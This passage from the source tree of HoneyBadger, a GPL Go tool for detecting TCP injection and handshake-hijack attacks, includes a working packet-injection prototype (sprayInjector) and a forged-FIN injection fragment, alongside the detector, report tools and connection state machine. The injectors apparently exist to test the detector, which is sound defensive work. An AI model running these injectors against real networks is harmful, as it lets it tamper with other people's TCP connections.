tcp.FIN = true
tcp.SYN = false
tcp.ACK = false
tcp.Seq = uint32(tcpassembly.Sequence(hijackSeq).Add(2))
if ipv6_mode {
streamInjector.SetIPv6Layer(ip6)
} else {
streamInjector.SetIPv4Layer(ip4)
}
streamInjector.SetTCPLayer(tcp)
err = streamInjector.Write()
if err != nil {
panic(err)
}
log.Print("FIN packet sent!\n")
return
}
}
================================================
FILE: cmd/honeyBadger/main.go
================================================
/*
* HoneyBadger main command line tool
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package main
import (
"flag"
"log"
"time"
"github.com/david415/HoneyBadger"
"github.com/david415/HoneyBadger/logging"
"github.com/david415/HoneyBadger/types"
)
func main() {
var (
pcapfile = flag.String("pcapfile", "", `pcap filename to read packets from rather than a wire interface.
This option is to be combined with a -daq= setting of either "pcapgo" OR "libpcap"!`)
iface = flag.String("i", "eth0", "Interface to get packets from")
snaplen = flag.Int("s", 65536, "SnapLen for pcap packet capture")
filter = flag.String("f", "tcp", "BPF filter for pcap")
logDir = flag.String("l", "", "incoming log dir used initially for pcap files if packet logging is enabled")
wireTimeout = flag.String("w", "3s", "timeout for reading packets off the wire")
metadataAttackLog = flag.Bool("metadata_attack_log", false, "if set to true then attack reports will only include metadata")
logPackets = flag.Bool("log_packets", false, "if set to true then log all packets for each tracked TCP connection")
tcpTimeout = flag.Duration("tcp_idle_timeout", time.Minute*10, "tcp idle timeout duration")
maxRingPackets = flag.Int("max_ring_packets", 40, "Max packets per connection stream ring buffer")
detectHijack = flag.Bool("detect_hijack", true, "Detect handshake hijack attacks")
detectInjection = flag.Bool("detect_injection", true, "Detect injection attacks")
detectCoalesceInjection = flag.Bool("detect_coalesce_injection", true, "Detect coalesce injection attacks")
maxConcurrentConnections = flag.Int("max_concurrent_connections", 300, "Maximum number of concurrent connection to track.")
bufferedPerConnection = flag.Int("connection_max_buffer", 100, `
Max packets to buffer for a single connection before skipping over a gap in data
and continuing to stream the connection after the buffer. If zero or less, this
is infinite.`)
bufferedTotal = flag.Int("total_max_buffer", 1000, `
Max packets to buffer total before skipping over gaps in connections and
continuing to stream connection data. If zero or less, this is infinite`)
maxPcapLogSize = flag.Int("max_pcap_log_size", 10, "maximum pcap size per rotation in megabytes")
maxNumPcapRotations = flag.Int("max_pcap_rotations", 100, "maximum number of pcap rotations per connection")
archiveDir = flag.String("archive_dir", "", "archive directory for storing attack logs and related pcap files")
daq = flag.String("daq", "libpcap", `Data AcQuisition packet source: pcapgo, libpcap, AF_PACKET or BSD_BPF.
BSD_BPF is BSD systems only.
AF_PACKET is Linux only.
libpcap builds on Linux and FreeBSD and can read every kind of pcap format.
pcapgo builds on every platform but does not support pcap-ng format, only pcap v2.4.
`)
)
flag.Parse()
if *daq == "pcapgo" && *pcapfile == "" {
log.Fatal("must specify a -pcapfile option when using -daq=pcapgo")
}
log.SetFlags(log.LUTC | log.Ldate | log.Ltime )
if *daq == "" {
log.Fatal("must specify a Data AcQuisition packet source`")
}
// XXX TODO use the pure golang pcap file sniffing API; gopacket's pcapgo
if *pcapfile != "" && (*daq != "libpcap" && *daq != "pcapgo") {
log.Fatal("only pcapgo and libpcap DAQs supports sniffing pcap files")
}
if *archiveDir == "" || *logDir == "" {
log.Fatal("must specify both incoming log dir and archive log dir with option flags -l and -archive_dir")
}
wireDuration, err := time.ParseDuration(*wireTimeout)
if err != nil {
log.Fatal("invalid wire timeout duration: ", *wireTimeout)
}
if *maxConcurrentConnections == 0 {
log.Fatal("maxConcurrentConnections must be specified")
}
if *bufferedPerConnection == 0 || *bufferedTotal == 0 {
log.Fatal("connection_max_buffer and total_max_buffer must be set to a non-zero value")
}
var logger types.Logger
if *metadataAttackLog {
loggerInstance := logging.NewAttackMetadataJsonLogger(*archiveDir)
loggerInstance.Start()
defer func() { loggerInstance.Stop() }()
logger = loggerInstance
} else {
loggerInstance := logging.NewAttackJsonLogger(*archiveDir)
loggerInstance.Start()
defer func() { loggerInstance.Stop() }()
logger = loggerInstance
}
dispatcherOptions := HoneyBadger.DispatcherOptions{
BufferedPerConnection: *bufferedPerConnection,
BufferedTotal: *bufferedTotal,
LogDir: *logDir,
LogPackets: *logPackets,
MaxPcapLogRotations: *maxNumPcapRotations,
MaxPcapLogSize: *maxPcapLogSize,
TcpIdleTimeout: *tcpTimeout,
MaxRingPackets: *maxRingPackets,
Logger: logger,
DetectHijack: *detectHijack,
DetectInjection: *detectInjection,
DetectCoalesceInjection: *detectCoalesceInjection,
MaxConcurrentConnections: *maxConcurrentConnections,
}
snifferDriverOptions := types.SnifferDriverOptions{
DAQ: *daq,
Device: *iface,
Filename: *pcapfile,
WireDuration: wireDuration,
Snaplen: int32(*snaplen),
Filter: *filter,
}
connectionFactory := &HoneyBadger.DefaultConnFactory{}
var packetLoggerFactory types.PacketLoggerFactory
if *logPackets {
packetLoggerFactory = logging.NewPcapLoggerFactory(*logDir, *archiveDir, *maxNumPcapRotations, *maxPcapLogSize)
} else {
packetLoggerFactory = nil
}
log.Println("HoneyBadger: comprehensive TCP injection attack detection.")
options := HoneyBadger.SupervisorOptions{
SnifferDriverOptions: &snifferDriverOptions,
DispatcherOptions: dispatcherOptions,
SnifferFactory: HoneyBadger.NewSniffer,
ConnectionFactory: connectionFactory,
PacketLoggerFactory: packetLoggerFactory,
}
supervisor := HoneyBadger.NewSupervisor(options)
supervisor.Run()
}
================================================
FILE: cmd/honeybadgerReportTool/main.go
================================================
/*
* HoneyBadger report deserialization tool
*
* Copyright (C) 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package main
import (
"bufio"
"flag"
"fmt"
"os"
"strings"
"encoding/base64"
"encoding/hex"
"encoding/json"
"github.com/david415/HoneyBadger/logging"
)
func lineDiff(a, b string) {
aLines := strings.Split(a, "\n")
bLines := strings.Split(b, "\n")
fmt.Print("Overlapping portion of reassembled TCP Stream:\n")
for i := 0; i < len(aLines); i++ {
if aLines[i] == bLines[i] {
fmt.Println(aLines[i])
} else {
fmt.Println(aLines[i])
}
}
fmt.Print("Injection packet whose contents did not coalesce into the TCP Stream:\n")
for i := 0; i < len(aLines); i++ {
if aLines[i] == bLines[i] {
fmt.Println(bLines[i])
} else {
fmt.Println(bLines[i])
}
}
}
func expandReport(reportPath string) {
fmt.Printf("attack report: %s\n", reportPath)
file, err := os.Open(reportPath)
if err != nil {
panic(err)
}
defer file.Close()
reader := bufio.NewReader(file)
var line string
line, err = reader.ReadString('\n')
for err == nil {
event := logging.SerializedEvent{}
err = json.Unmarshal([]byte(line), &event)
if err != nil {
panic(err)
}
fmt.Printf("Event Type: %s\nFlow: %s\nTime: %s\n", event.Type, event.Flow, event.Time.UTC())
fmt.Printf("Packet Number: %d\n", event.PacketCount)
fmt.Printf("HijackSeq: %d HijackAck: %d\nStart: %d End: %d\nBase Sequence: %d\n\n", event.HijackSeq, event.HijackAck, event.Start, event.End, event.Base)
var payload []byte
var overlap []byte
overlap, err = base64.StdEncoding.DecodeString(event.Winner)
if err != nil {
panic(err)
}
payload, err = base64.StdEncoding.DecodeString(event.Loser)
if err != nil {
panic(err)
}
lineDiff(hex.Dump(overlap), hex.Dump(payload))
line, err = reader.ReadString('\n')
}
}
func main() {
var ()
flag.Parse()
reports := flag.Args()
for i := 0; i < len(reports); i++ {
expandReport(reports[i])
}
}
================================================
FILE: cmd/honeybadgerReportTool/tcp_port_distribution.py
================================================
#!/usr/bin/python
import re
import sys
import os
import argparse
def count_distribution(filename, or_addr):
port_map = {}
count = 0
for line in open(filename):
count += 1
m = re.search(' ([0-9.]+):([0-9]+)-(.+):([0-9]+)', line)
if m is None:
print "parse fail"
sys.exit(-1)
addr1 = m.group(1)
addr2 = m.group(3)
if addr1 == or_addr:
dest_port = m.group(4)
else:
dest_port = m.group(2)
if port_map.has_key(int(dest_port)):
port_map[int(dest_port)] += 1
else:
port_map[int(dest_port)] = 1
return port_map
def main():
parser = argparse.ArgumentParser()
parser.add_argument("or_addr", help="origin ipv4 address")
parser.add_argument("total", help="total flows")
parser.add_argument("attack", help="attack flows")
args = parser.parse_args()
total_map = count_distribution(args.total, args.or_addr)
attack_map = count_distribution(args.attack, args.or_addr)
#print attack_map
#print total_map
total_total = 0
for port in sorted(total_map.keys()):
total_total += int(total_map[int(port)])
for port in sorted(attack_map.keys(), reverse=True):
#if attack_map.has_key(port) and total_map.has_key(port):
frequency = float(attack_map[int(port)]) / float(total_map[int(port)])
total_freq = float(total_map[int(port)]) / float(total_total)
print "port %s frequency %s attacks %s total %s (expected %s)\n" % (port, frequency, attack_map[int(port)], total_map[int(port)], total_freq)
for port in sorted(total_map.keys()):
if total_map[port] > 0:
print "port %s total %d" % (port, total_map[port])
if __name__ == '__main__':
main()
================================================
FILE: cmd/honeybadgerReportToolColor/main.go
================================================
/*
* HoneyBadger report deserialization tool
*
* Copyright (C) 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package main
import (
"bufio"
"flag"
"fmt"
"os"
"strings"
"encoding/base64"
"encoding/hex"
"encoding/json"
"github.com/david415/HoneyBadger/logging"
"github.com/fatih/color"
)
func colorLineDiff(a, b string) {
aLines := strings.Split(a, "\n")
bLines := strings.Split(b, "\n")
fmt.Print("Overlapping portion of reassembled TCP Stream:\n")
for i := 0; i < len(aLines); i++ {
if aLines[i] == bLines[i] {
color.Blue(aLines[i])
} else {
color.Green(aLines[i])
}
}
fmt.Print("Injection packet whose contents did not coalesce into the TCP Stream:\n")
for i := 0; i < len(aLines); i++ {
if aLines[i] == bLines[i] {
color.Cyan(bLines[i])
} else {
color.Red(bLines[i])
}
}
}
func expandReport(reportPath string) {
fmt.Printf("attack report: %s\n", reportPath)
file, err := os.Open(reportPath)
if err != nil {
panic(err)
}
defer file.Close()
reader := bufio.NewReader(file)
var line string
line, err = reader.ReadString('\n')
for err == nil {
event := logging.SerializedEvent{}
err = json.Unmarshal([]byte(line), &event)
if err != nil {
panic(err)
}
fmt.Printf("Event Type: %s\nFlow: %s\nTime: %s\n", event.Type, event.Flow, event.Time.UTC())
fmt.Printf("Packet Number: %d\n", event.PacketCount)
fmt.Printf("HijackSeq: %d HijackAck: %d\nStart: %d End: %d\nBase Sequence: %d\n\n", event.HijackSeq, event.HijackAck, event.Start, event.End, event.Base)
var payload []byte
var overlap []byte
overlap, err = base64.StdEncoding.DecodeString(event.Winner)
if err != nil {
panic(err)
}
payload, err = base64.StdEncoding.DecodeString(event.Loser)
if err != nil {
panic(err)
}
colorLineDiff(hex.Dump(overlap), hex.Dump(payload))
line, err = reader.ReadString('\n')
}
}
func main() {
var ()
flag.Parse()
reports := flag.Args()
for i := 0; i < len(reports); i++ {
expandReport(reports[i])
}
}
================================================
FILE: cmd/sprayInjector/main.go
================================================
/*
* rough but working prototype; probabalistic ordered coalesce TCP stream injector!
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package main
import (
"flag"
"fmt"
"github.com/david415/HoneyBadger/attack"
"github.com/david415/HoneyBadger/types"
"github.com/google/gopacket"
"github.com/google/gopacket/examples/util"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcap"
"log"
"net"
)
var iface = flag.String("i", "lo", "Interface to get packets from")
var filter = flag.String("f", "tcp", "BPF filter for pcap")
var snaplen = flag.Int("s", 65536, "SnapLen for pcap packet capture")
var serviceIPstr = flag.String("d", "127.0.0.1", "target TCP flows from this IP address")
var servicePort = flag.Int("e", 9666, "target TCP flows from this port")
var coalesce1 = flag.Bool("coalesce1", true, "perform the TCP coalesce1 injection")
var coalesce2 = flag.Bool("coalesce2", true, "perform the TCP coalesce2 injection")
var spray = flag.Bool("spray", true, "perform the TCP sloppy probalistic injection")
func main() {
defer util.Run()()
var eth layers.Ethernet
var dot1q layers.Dot1Q
var ip4 layers.IPv4
var ip6 layers.IPv6
var ip6extensions layers.IPv6ExtensionSkipper
var tcp layers.TCP
var payload gopacket.Payload
decoded := make([]gopacket.LayerType, 0, 4)
// target/track all TCP flows from this TCP/IP service endpoint
trackedFlows := make(map[types.TcpIpFlow]int)
serviceIP := net.ParseIP(*serviceIPstr)
if serviceIP == nil {
panic(fmt.Sprintf("non-ip target: %s\n", *serviceIPstr))
}
ipv4_mode := false
ipv6_mode := false
if serviceIP.To4() != nil {
log.Print("using ipv4 mode")
ipv4_mode = true
} else if len(serviceIP) == 16 {
log.Print("using ipv6 mode")
ipv6_mode = true
} else {
panic("wtf")
}
gap_payload := []byte("Many of these well-funded state/world-class adversaries are able to completely automate the compromising of computers using these TCP injection attacks against real people to violate their human rights.")
attack_payload := []byte("Privacy is necessary for an open society in the electronic age. Privacy is not secrecy. A private matter is something one doesn't want the whole world to know, but a secret matter is something one doesn't want anybody to know. Privacy is the power to selectively reveal oneself to the world.")
handle, err := pcap.OpenLive(*iface, int32(*snaplen), true, pcap.BlockForever)
if err != nil {
log.Fatal("error opening pcap handle: ", err)
}
streamInjector := attack.NewTCPStreamInjector(handle, ipv6_mode)
if err := handle.SetBPFFilter(*filter); err != nil {
log.Fatal("error setting BPF filter: ", err)
}
parser := gopacket.NewDecodingLayerParser(layers.LayerTypeEthernet,
ð, &dot1q, &ip4, &ip6, &ip6extensions, &tcp, &payload)
flow := &types.TcpIpFlow{}
log.Print("collecting packets...\n")
for {
data, ci, err := handle.ReadPacketData()
if err != nil {
log.Printf("error getting packet: %v %v", err, ci)
continue
}
err = parser.DecodeLayers(data, &decoded)
if err != nil {
log.Printf("error decoding packet: %v", err)
continue
}
foundIPv6 := false
foundIPv4 := false
foundTcpLayer := false
for _, typ := range decoded {
switch typ {
case layers.LayerTypeIPv4:
foundIPv4 = true
case layers.LayerTypeIPv6:
foundIPv6 = true
case layers.LayerTypeTCP:
if foundIPv4 || foundIPv6 {
foundTcpLayer = true
}
} // switch
} // for
if !foundTcpLayer {
continue
}
if ipv4_mode && foundIPv6 {
continue
}
if ipv6_mode && foundIPv4 {
continue
}
if ipv4_mode {
// if tcp.SrcPort != layers.TCPPort(*servicePort) || !ip4.SrcIP.Equal(serviceIP.To4()) {
if tcp.SrcPort != layers.TCPPort(*servicePort) || !ip4.SrcIP.Equal(serviceIP) {
continue
}
} else if ipv6_mode {
if tcp.SrcPort != layers.TCPPort(*servicePort) || !ip6.SrcIP.Equal(serviceIP) {
continue
}
} else {
panic("wtf")
}
if foundIPv4 == true {
flow = types.NewTcpIp4FlowFromLayers(ip4, tcp)
} else if foundIPv6 == true {
f := types.NewTcpIpFlowFromFlows(ip6.NetworkFlow(), tcp.TransportFlow())
flow = &f
} else {
panic("wtf")
}
_, isTracked := trackedFlows[*flow]
if isTracked {
trackedFlows[*flow] += 1
} else {
trackedFlows[*flow] = 1
}
// after some packets from a given flow then inject packets into the stream
if trackedFlows[*flow] == 5 {
streamInjector.SetEthernetLayer(ð)
if ipv4_mode {
streamInjector.SetIPv4Layer(ip4)
} else if ipv6_mode {
streamInjector.SetIPv6Layer(ip6)
} else {
panic("wtf")
}
if err != nil {
panic(err)
}
streamInjector.SetTCPLayer(tcp)
// choose which injection attack to perform
if *coalesce1 {
err = streamInjector.SprayFutureAndFillGapPackets(tcp.Seq, gap_payload, attack_payload, *coalesce1)
} else if *coalesce2 {
err = streamInjector.SprayFutureAndFillGapPackets(tcp.Seq, gap_payload, attack_payload, *coalesce2)
} else if *spray {
err = streamInjector.SpraySequenceRangePackets(tcp.Seq, 20)
}
if err != nil {
panic(err)
}
log.Print("tcp injection sent!\n")
}
}
}
================================================
FILE: cmd/testBpfSniffer/README
================================================
// this was briefly useful for debuging the gopacket bsdbpf packet capture api
// as i was developing it
package main
import (
"fmt"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/bsdbpf"
)
func main() {
var err error
var ci gopacket.CaptureInfo
var frame []byte
sniffer, err := bsdbpf.NewBPFSniffer("alc0", nil)
if err != nil {
panic(err)
}
for {
frame,ci,err = sniffer.ReadPacketData()
if err != nil {
panic(err)
}
fmt.Printf("timeStamp %s\n", ci.Timestamp)
packet := gopacket.NewPacket(frame, layers.LayerTypeEthernet, gopacket.Default)
// Get the TCP layer from this packet
if tcpLayer := packet.Layer(layers.LayerTypeTCP); tcpLayer != nil {
fmt.Println("This is a TCP packet!")
// Get actual TCP data from this layer
tcp, _ := tcpLayer.(*layers.TCP)
fmt.Printf("From src port %d to dst port %d\n", tcp.SrcPort, tcp.DstPort)
}
// Iterate over all layers, printing out each layer type
for _, layer := range packet.Layers() {
fmt.Println("PACKET LAYER:", layer.LayerType())
}
}
}
================================================
FILE: connection.go
================================================
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package HoneyBadger
import (
"log"
"sync"
"time"
"github.com/david415/HoneyBadger/types"
)
const (
// Stop looking for handshake hijack after several
// packets have traversed the connection after entering
// into TCP_DATA_TRANSFER state
FIRST_FEW_PACKETS = 12
// TCP states
TCP_UNKNOWN = 0
TCP_CONNECTION_REQUEST = 1
TCP_CONNECTION_ESTABLISHED = 2
TCP_DATA_TRANSFER = 3
TCP_CONNECTION_CLOSING = 4
TCP_INVALID = 5
TCP_CLOSED = 6
// initiating TCP closing finite state machine
TCP_FIN_WAIT1 = 0
TCP_FIN_WAIT2 = 1
TCP_TIME_WAIT = 2
TCP_CLOSING = 3
// initiated TCP closing finite state machine
TCP_CLOSE_WAIT = 0
TCP_LAST_ACK = 1
)
type ConnectionFactory interface {
Build(ConnectionOptions) ConnectionInterface
}
type DefaultConnFactory struct {
}
func (f *DefaultConnFactory) Build(options ConnectionOptions) ConnectionInterface {
conn := Connection{
packetCount: 0,
ConnectionOptions: options,
attackDetected: false,
state: TCP_UNKNOWN,
skipHijackDetectionCount: FIRST_FEW_PACKETS,
clientNextSeq: types.InvalidSequence,
serverNextSeq: types.InvalidSequence,
ClientStreamRing: types.NewRing(options.MaxRingPackets),
ServerStreamRing: types.NewRing(options.MaxRingPackets),
clientFlow: &types.TcpIpFlow{},
serverFlow: &types.TcpIpFlow{},
}
conn.ClientCoalesce = NewOrderedCoalesce(conn.AttackLogger, conn.clientFlow, conn.PageCache, conn.ClientStreamRing, conn.MaxBufferedPagesTotal, conn.MaxBufferedPagesPerConnection/2, conn.DetectCoalesceInjection, &conn.attackDetected)
conn.ServerCoalesce = NewOrderedCoalesce(conn.AttackLogger, conn.serverFlow, conn.PageCache, conn.ServerStreamRing, conn.MaxBufferedPagesTotal, conn.MaxBufferedPagesPerConnection/2, conn.DetectCoalesceInjection, &conn.attackDetected)
return &conn
}
type ConnectionInterface interface {
Close()
GetClientFlow() *types.TcpIpFlow
SetPacketLogger(types.PacketLogger)
GetLastSeen() time.Time
ReceivePacket(*types.PacketManifest)
}
type PacketDispatcher interface {
ReceivePacket(*types.PacketManifest)
GetObservedConnectionsChan(int) chan bool
Connections() []ConnectionInterface
Stop()
}
type ConnectionOptions struct {
MaxBufferedPagesTotal int
MaxBufferedPagesPerConnection int
MaxRingPackets int
PageCache *pageCache
LogDir string
LogPackets bool
AttackLogger types.Logger
DetectHijack bool
DetectInjection bool
DetectCoalesceInjection bool
}
// Connection is used to track client and server flows for a given TCP connection.
// We implement a basic TCP finite state machine and track state in order to detect
// hanshake hijack and other TCP attacks such as segment veto and sloppy injection.
type Connection struct {
ConnectionOptions
attackDetected bool
packetCount uint64
skipHijackDetectionCount uint64
lastSeen time.Time
lastSeenMutex sync.Mutex
state uint8
clientState uint8
serverState uint8
clientFlow *types.TcpIpFlow
serverFlow *types.TcpIpFlow
closingFlow *types.TcpIpFlow
closingRST bool
closingFIN bool
closingSeq types.Sequence
clientNextSeq types.Sequence
serverNextSeq types.Sequence
hijackNextAck types.Sequence
firstSynAckSeq uint32
ClientStreamRing *types.Ring
ServerStreamRing *types.Ring
ClientCoalesce *OrderedCoalesce
ServerCoalesce *OrderedCoalesce
PacketLogger types.PacketLogger
}
func (c *Connection) GetClientFlow() *types.TcpIpFlow {
return c.clientFlow
}
func (c *Connection) SetPacketLogger(logger types.PacketLogger) {
c.PacketLogger = logger
}
// GetLastSeen returns the lastSeen timestamp after grabbing the lock
func (c *Connection) GetLastSeen() time.Time {
c.lastSeenMutex.Lock()
defer c.lastSeenMutex.Unlock()
return c.lastSeen
}
// updateLastSeen updates our lastSeen with the new timestamp after grabbing the lock
func (c *Connection) updateLastSeen(timestamp time.Time) {
c.lastSeenMutex.Lock()
defer c.lastSeenMutex.Unlock()
if c.lastSeen.Before(timestamp) {
c.lastSeen = timestamp
}
}
// Close can be used by the the connection or the dispatcher to close the connection
func (c *Connection) Close() {
log.Print("Close()")
if c.attackDetected == false {
if c.PacketLogger != nil {
log.Print("no attack detected. removing pcap logs")
c.PacketLogger.Remove()
}
} else {
if c.LogPackets {
log.Print("attack detected; archiving connection's pcap logs\n")
c.PacketLogger.Archive()
}
}
c.ClientCoalesce.Close()
c.ServerCoalesce.Close()
if c.LogPackets {
c.PacketLogger.Stop()
c.PacketLogger = nil // just in case the state machine receives another packet...
}
}
// detectHijack checks for duplicate SYN/ACK indicating handshake hijake
// and submits a report if an attack was observed
func (c *Connection) detectHijack(p *types.PacketManifest, flow *types.TcpIpFlow) {
// check for duplicate SYN/ACK indicating handshake hijake
if !flow.Equal(c.serverFlow) {
return
}
if p.TCP.ACK && p.TCP.SYN {
if types.Sequence(p.TCP.Ack).Difference(c.hijackNextAck) == 0 {
if p.TCP.Seq != c.firstSynAckSeq {
log.Print("handshake hijack detected\n")
c.AttackLogger.Log(&types.Event{
Time: time.Now(),
Type: "handshake-hijack",
PacketCount: c.packetCount,
Flow: *flow,
HijackSeq: p.TCP.Seq,
HijackAck: p.TCP.Ack})
c.attackDetected = true
} else {
log.Print("SYN/ACK retransmission\n")
}
}
}
}
func (c *Connection) detectInjection(p *types.PacketManifest) {
var ringPtr *types.Ring
if p.Flow.Equal(c.clientFlow) {
ringPtr = c.ServerStreamRing
} else {
ringPtr = c.ClientStreamRing
}
start := types.Sequence(p.TCP.Seq)
end := types.Sequence(p.TCP.Seq).Add(len(p.Payload))
// injection detection
events := checkForInjectionInRing(ringPtr, start, end, p.Payload)
if len(events) == 0 {
return
}
// log events if any
for i := 0; i < len(events); i++ {
if events[i] == nil {
panic("wtf got nil event")
} else {
if len(events[i].Type) == 0 {
events[i].Type = "segment veto or sloppy injection"
}
events[i].Base = types.Sequence(p.TCP.Seq)
events[i].Time = p.Timestamp
events[i].Flow = *p.Flow
events[i].Payload = p.Payload
events[i].PacketCount = c.packetCount
c.AttackLogger.Log(events[i])
c.attackDetected = true
log.Printf("injection detected in packet # %d\n", c.packetCount)
}
}
}
// stateUnknown gets called by our TCP finite state machine runtime
// and moves us into the TCP_CONNECTION_REQUEST state if we receive
// a SYN packet... otherwise TCP_DATA_TRANSFER state.
func (c *Connection) stateUnknown(p *types.PacketManifest) {
c.clientFlow = p.Flow
f := p.Flow.Reverse()
c.serverFlow = &f
if p.TCP.SYN && !p.TCP.ACK {
c.state = TCP_CONNECTION_REQUEST
// Note that TCP SYN and SYN/ACK packets may contain payload data if
// a TCP extension is used...
// If so then the sequence number needs to track this payload.
// For more information see: https://tools.ietf.org/id/draft-agl-tcpm-sadata-00.html
c.clientNextSeq = types.Sequence(p.TCP.Seq).Add(len(p.Payload) + 1)
c.hijackNextAck = c.clientNextSeq
} else {
// else process a connection after handshake
c.state = TCP_DATA_TRANSFER
// skip handshake hijack detection completely
c.skipHijackDetectionCount = 0
c.clientNextSeq = types.Sequence(p.TCP.Seq).Add(len(p.Payload) + 1)
if len(p.Payload) > 0 {
reassembly := types.Reassembly{
Seq: types.Sequence(p.TCP.Seq),
Bytes: []byte(p.Payload),
Seen: p.Timestamp,
}
c.ServerStreamRing.Reassembly = &reassembly
c.ServerStreamRing = c.ServerStreamRing.Next()
c.clientNextSeq = types.Sequence(p.TCP.Seq).Add(len(p.Payload))
}
if p.TCP.FIN || p.TCP.RST {
c.state = TCP_CLOSED
c.closingFlow = p.Flow
c.closingSeq = types.Sequence(p.TCP.Seq)
return
}
}
}
// stateConnectionRequest gets called by our TCP finite state machine runtime
// and moves us into the TCP_CONNECTION_ESTABLISHED state if we receive
// a SYN/ACK packet.
func (c *Connection) stateConnectionRequest(p *types.PacketManifest) {
if !p.Flow.Equal(c.serverFlow) {
log.Print("handshake anomaly")
return
}
if !(p.TCP.SYN && p.TCP.ACK) {
log.Print("handshake anomaly")
return
}
if c.clientNextSeq.Difference(types.Sequence(p.TCP.Ack)) != 0 {
log.Print("handshake anomaly")
return
}
c.state = TCP_CONNECTION_ESTABLISHED
c.serverNextSeq = types.Sequence(p.TCP.Seq).Add(len(p.Payload) + 1) // XXX see above comment about TCP extentions
c.firstSynAckSeq = p.TCP.Seq
}
// stateConnectionEstablished is called by our TCP FSM runtime and
// changes our state to TCP_DATA_TRANSFER if we receive a valid final
// handshake ACK packet.
func (c *Connection) stateConnectionEstablished(p *types.PacketManifest) {
if !c.attackDetected {
if c.DetectHijack {
c.detectHijack(p, p.Flow)
if c.attackDetected {
return
}
}
}
if !p.Flow.Equal(c.clientFlow) {
log.Print("handshake anomaly")
return
}
if !p.TCP.ACK || p.TCP.SYN {
log.Print("handshake anomaly")
return
}
if types.Sequence(p.TCP.Seq).Difference(c.clientNextSeq) != 0 {
log.Print("handshake anomaly")
return
}
if types.Sequence(p.TCP.Ack).Difference(c.serverNextSeq) != 0 {
log.Print("handshake anomaly")
return
}
c.state = TCP_DATA_TRANSFER
log.Printf("connected %s\n", c.clientFlow.String())
}
// stateDataTransfer is called by our TCP FSM and processes packets
// once we are in the TCP_DATA_TRANSFER state
func (c *Connection) stateDataTransfer(p *types.PacketManifest) {
var closerState, remoteState *uint8
var diff int
isEnd := false
if c.clientNextSeq == types.InvalidSequence && p.Flow.Equal(c.clientFlow) {
c.clientNextSeq = types.Sequence(p.TCP.Seq)
} else if c.serverNextSeq == types.InvalidSequence && p.Flow.Equal(c.serverFlow) {
c.serverNextSeq = types.Sequence(p.TCP.Seq)
}
if c.packetCount < c.skipHijackDetectionCount {
if c.DetectHijack {
c.detectHijack(p, p.Flow)
}
}
if p.Flow.Equal(c.clientFlow) {
diff = c.clientNextSeq.Difference(types.Sequence(p.TCP.Seq))
closerState = &c.clientState
remoteState = &c.serverState
} else if p.Flow.Equal(c.serverFlow) {
diff = c.serverNextSeq.Difference(types.Sequence(p.TCP.Seq))
closerState = &c.serverState
remoteState = &c.clientState
} else {
log.Printf("packet flow %s clientflow %s serverflow %s\n", p.Flow, c.clientFlow, c.serverFlow)
panic("wtf")
}
if diff == 0 { // contiguous
if len(p.Payload) > 0 {
reassembly := types.Reassembly{
Seq: types.Sequence(p.TCP.Seq),
Bytes: []byte(p.Payload),
Seen: p.Timestamp,
}
if p.Flow.Equal(c.clientFlow) {
c.ServerStreamRing.Reassembly = &reassembly
c.ServerStreamRing = c.ServerStreamRing.Next()
c.clientNextSeq = types.Sequence(p.TCP.Seq).Add(len(p.Payload))
prev := c.clientNextSeq
c.clientNextSeq, isEnd = c.ServerCoalesce.addContiguous(c.clientNextSeq)
if c.clientNextSeq != prev {
reassembly.IsCoalesceGap = true
}
if isEnd {
c.state = TCP_CLOSED
return
}
} else {
c.ClientStreamRing.Reassembly = &reassembly
c.ClientStreamRing = c.ClientStreamRing.Next()
c.serverNextSeq = types.Sequence(p.TCP.Seq).Add(len(p.Payload))
prev := c.serverNextSeq
c.serverNextSeq, isEnd = c.ClientCoalesce.addContiguous(c.serverNextSeq)
if c.serverNextSeq != prev {
reassembly.IsCoalesceGap = true
}
if isEnd {
c.state = TCP_CLOSED
return
}
}
}
if p.TCP.RST {
log.Print("got RST!\n")
c.closingRST = true
c.state = TCP_CLOSED
c.closingFlow = p.Flow
